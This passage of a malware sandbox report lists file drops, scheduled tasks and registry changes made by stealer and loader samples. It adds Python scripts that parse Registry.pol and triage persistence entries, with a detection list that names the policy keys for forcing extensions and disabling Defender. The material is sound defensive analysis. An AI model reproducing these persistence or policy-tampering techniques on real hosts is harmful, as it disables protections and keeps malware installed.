| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\FDxSmxakU\aUoLPQQ.xml | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
| File created | C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\KrYdjfY.dll | C:\Windows\Temp\BhywXhhbcuWpvQvH\imJuHYElqEyLwtg\dVAPrcg.exe | N/A |
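Install.exe and dVAPrcg.exe write `gpt.ini` and `GroupPolicy\Machine\Registry.pol` under System32, drop extension manifests into the Chrome profile and a `.xpi` into Firefox's `browser\features` directory, and (see the gpupdate.exe entries later in this report) refresh local policy. Registry.pol is the machine-local Group Policy registry file in the documented [MS-GPREG] layout: a `PReg` signature, a version DWORD, then `[key;value;type;size;data]` records with UTF-16LE strings and little-endian DWORDs for type and size. The parser below is an added example, not the sandbox's code or the malware's: it serialises and parses that format and flags the policy keys commonly used to force browser extensions in or switch Defender off. The report does not include the contents of this sample's Registry.pol, so the sample entries are constructed (the two extension ids are the ones dropped into the Chrome profile above) and the choice of suspect keys is an assumption.

```python
import struct

PREG_MAGIC = b"PReg"
PREG_VERSION = 1
REG_SZ, REG_DWORD = 1, 4


def _wstr(s):
    """NUL-terminated UTF-16LE string, as Registry.pol stores keys, names and REG_SZ data."""
    return s.encode("utf-16-le") + b"\x00\x00"


def build_registry_pol(entries):
    """Serialise (key, value_name, type, raw_data) tuples in the [MS-GPREG] on-disk layout."""
    out = bytearray(PREG_MAGIC + struct.pack("<I", PREG_VERSION))
    for key, name, rtype, data in entries:
        out += "[".encode("utf-16-le")
        out += _wstr(key) + ";".encode("utf-16-le")
        out += _wstr(name) + ";".encode("utf-16-le")
        out += struct.pack("<I", rtype) + ";".encode("utf-16-le")
        out += struct.pack("<I", len(data)) + ";".encode("utf-16-le")
        out += data + "]".encode("utf-16-le")
    return bytes(out)


def _read_wstr(blob, pos):
    """Read a NUL-terminated UTF-16LE string at pos; steps two bytes at a time so an
    0x00 byte inside an ASCII code unit (e.g. 'A' = 41 00) is not mistaken for the end."""
    end = pos
    while blob[end:end + 2] != b"\x00\x00":
        end += 2
        if end >= len(blob):
            raise ValueError("unterminated string in Registry.pol")
    return blob[pos:end].decode("utf-16-le"), end + 2


def _expect(blob, pos, ch):
    if blob[pos:pos + 2] != ch.encode("utf-16-le"):
        raise ValueError(f"expected {ch!r} at offset {pos}")
    return pos + 2


def parse_registry_pol(blob):
    """Return a list of (key, value_name, type, decoded_data) from a Registry.pol blob."""
    if blob[:4] != PREG_MAGIC or struct.unpack_from("<I", blob, 4)[0] != PREG_VERSION:
        raise ValueError("not a version-1 Registry.pol file")
    pos, entries = 8, []
    while pos < len(blob):
        pos = _expect(blob, pos, "[")
        key, pos = _read_wstr(blob, pos)
        pos = _expect(blob, pos, ";")
        name, pos = _read_wstr(blob, pos)
        pos = _expect(blob, pos, ";")
        rtype = struct.unpack_from("<I", blob, pos)[0]
        pos = _expect(blob, pos + 4, ";")
        size = struct.unpack_from("<I", blob, pos)[0]
        pos = _expect(blob, pos + 4, ";")
        raw, pos = blob[pos:pos + size], pos + size
        pos = _expect(blob, pos, "]")
        if rtype == REG_SZ:
            data = raw.decode("utf-16-le").rstrip("\x00")
        elif rtype == REG_DWORD:
            data = struct.unpack("<I", raw)[0]
        else:
            data = raw
        entries.append((key, name, rtype, data))
    return entries


# Policy keys that force browser extensions or disable Defender. Assumption: the report
# shows Registry.pol being written, not what it contains.
SUSPECT_KEY_PREFIXES = (
    r"software\policies\google\chrome\extensioninstallforcelist",
    r"software\policies\google\chrome\extensionsettings",
    r"software\policies\microsoft\edge\extensioninstallforcelist",
    r"software\policies\mozilla\firefox\extensions\install",
    r"software\policies\microsoft\windows defender",
)


def flag_policy_entries(entries):
    """Return the entries whose key falls under a suspect policy prefix."""
    return [e for e in entries if e[0].lower().startswith(SUSPECT_KEY_PREFIXES)]


# Constructed sample; only the two extension ids come from this report.
SAMPLE_ENTRIES = [
    (r"Software\Policies\Google\Chrome\ExtensionInstallForcelist", "1", REG_SZ,
     _wstr("agcghmjnenlfcjmnldooeaadankclolo")),
    (r"Software\Policies\Google\Chrome\ExtensionInstallForcelist", "2", REG_SZ,
     _wstr("oikgcnjambfooaigmdljblbaeelmekem")),
    (r"Software\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", REG_DWORD, struct.pack("<I", 1)),
    (r"Software\Policies\Microsoft\Windows\Explorer", "NoAutoplayfornonVolume", REG_DWORD, struct.pack("<I", 1)),
]

if __name__ == "__main__":
    for key, name, _, data in flag_policy_entries(parse_registry_pol(build_registry_pol(SAMPLE_ENTRIES))):
        print(f"{key}\\{name} = {data!r}")
```

On a live host, feed `parse_registry_pol` the bytes of `C:\Windows\System32\GroupPolicy\Machine\Registry.pol`; a file that exists on a machine with no local policy configured, or that carries extension force-install or Defender entries, is worth a closer look given the drops recorded above. Note that Chrome honours a forced-install policy even when the extension directory was planted by the same process, so the manifest drops and the policy file should be read together.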
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\hzhNAJUNSjjdIpELG.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FnGigHNXGPuYnow.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\gXgiPdpSGbihZCqEr.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe | N/A |
| File created | C:\Windows\Tasks\bOYLEOfZCACcRQIJvG.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
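This run establishes persistence three ways: `Run` values under HKCU (the "Microsoft Subsystem Framework" entry pointing into ProgramData, and "Windows" pointing at `C:\Users\Admin\Windows.exe`), `.lnk`/`.url` files in the user's Startup folder, and `.job` files under `C:\Windows\Tasks`, several created through schtasks.exe or cmd.exe rather than by the payload itself. The script below is an added example, not part of the sandbox output or of the malware: it triages rows in this report's table format, recovers the executable path from the report's escaped `Run` value strings, and attaches the flags a reviewer would look for (payload in a user-writable path, vendor-sounding names, generated-looking task names, entries written by a system utility whose parent is the real actor). The sample rows are copied from the tables above; the flag heuristics are this example's own assumptions.

```python
import re
from pathlib import PureWindowsPath

# One report row: | Description | Indicator | Process | Target |
ROW = re.compile(r"^\|\s*(?P<action>[^|]*?)\s*\|\s*(?P<ind>[^|]*?)\s*\|\s*(?P<proc>[^|]*?)\s*\|")
RUN_VALUE = re.compile(r"\\CurrentVersion\\Run\\(?P<name>.+?) = \"(?P<data>.*)\"$", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\(?P<name>[^\\]+)$", re.I)
TASKS_DIR = re.compile(r"^C:\\Windows\\Tasks\\(?P<name>[^\\]+\.job)$", re.I)

# Writers that are Windows utilities: the entry is real, but the actor is their parent.
SYSTEM_UTILITIES = {"cmd.exe", "schtasks.exe", "reg.exe", "powershell.exe"}


def unescape_report_string(s):
    """Undo the report's C-style escaping (\\\\ -> \\, \\" -> ") and drop outer quotes."""
    return re.sub(r"\\(.)", r"\1", s).strip('"')


def looks_random(name):
    """Crude generated-name check: four or more upper/lower flips inside one alphabetic token."""
    for tok in re.findall(r"[A-Za-z]+", name):
        flips = sum(a.isupper() != b.isupper() for a, b in zip(tok, tok[1:]))
        if flips >= 4:
            return True
    return False


def is_user_writable(path):
    p = path.lower()
    return p.startswith(("c:\\users\\", "c:\\programdata\\")) or "\\temp\\" in p


def triage_persistence(rows):
    """Return one finding per persistence artifact: mechanism, artifact, payload, writer, flags."""
    findings = []
    for line in rows:
        m = ROW.match(line.strip())
        if not m or m["action"] == "Description":
            continue
        action, ind, proc = m["action"], m["ind"], PureWindowsPath(m["proc"]).name
        rv, sd, td = RUN_VALUE.search(ind), STARTUP_DIR.search(ind), TASKS_DIR.match(ind)
        # Only count creations, so "File opened for modification" rows do not double-count.
        if rv and action.startswith("Set value"):
            finding = {"mechanism": "run-key", "artifact": rv["name"],
                       "payload": unescape_report_string(rv["data"])}
        elif sd and action == "File created":
            finding = {"mechanism": "startup-folder", "artifact": sd["name"], "payload": None}
        elif td and action == "File created":
            finding = {"mechanism": "scheduled-task", "artifact": td["name"], "payload": None}
        else:
            continue
        flags = []
        if finding["payload"] and is_user_writable(finding["payload"]):
            flags.append("payload-in-user-writable-path")
        if re.search(r"microsoft|windows", finding["artifact"], re.I):
            flags.append("vendor-lookalike-name")
        if looks_random(finding["artifact"]):
            flags.append("generated-name")
        if proc in SYSTEM_UTILITIES:
            flags.append("written-by-system-utility")
        finding.update(process=proc, flags=flags)
        findings.append(finding)
    return findings


# Rows copied from the Run-key, Startup-file and Windows-directory tables of this report.
SAMPLE_ROWS = r"""
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Subsystem Framework = "\"C:\\ProgramData\\Microsoft Subsystem Framework\\winmsbt.exe\"" | C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\Windows.exe" | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\1000308001\freedom.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Windows\Tasks\hzhNAJUNSjjdIpELG.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\32840e92ff85953eb053cbd48e14155f9373064f1e6b991f26c00b541ea884c9.exe | N/A |
""".strip().splitlines()

if __name__ == "__main__":
    for f in triage_persistence(SAMPLE_ROWS):
        print(f"{f['mechanism']:16} {f['artifact']:28} {f['process']:14} {f['flags']}")
```

Two of the findings illustrate why the writer column alone is misleading: `TurtleHarbor.url` is attributed to cmd.exe and the three random-named `.job` files to schtasks.exe, so the process tree, not this table, identifies which dropped executable asked for them. The `.job` files under `C:\Windows\Tasks` are the legacy task-scheduler format; the "Uses Task Scheduler COM API" signature above indicates the modern `Schedule\TaskCache` path was used as well, so a host-side check should cover both.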
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000223001\a6035a70b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\DZo08TTbLE.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\filename.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\forfiles.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\gpupdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000026001\joffer2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000129001\Sеtup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" | C:\Users\Admin\AppData\Local\Temp\7zS6685.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
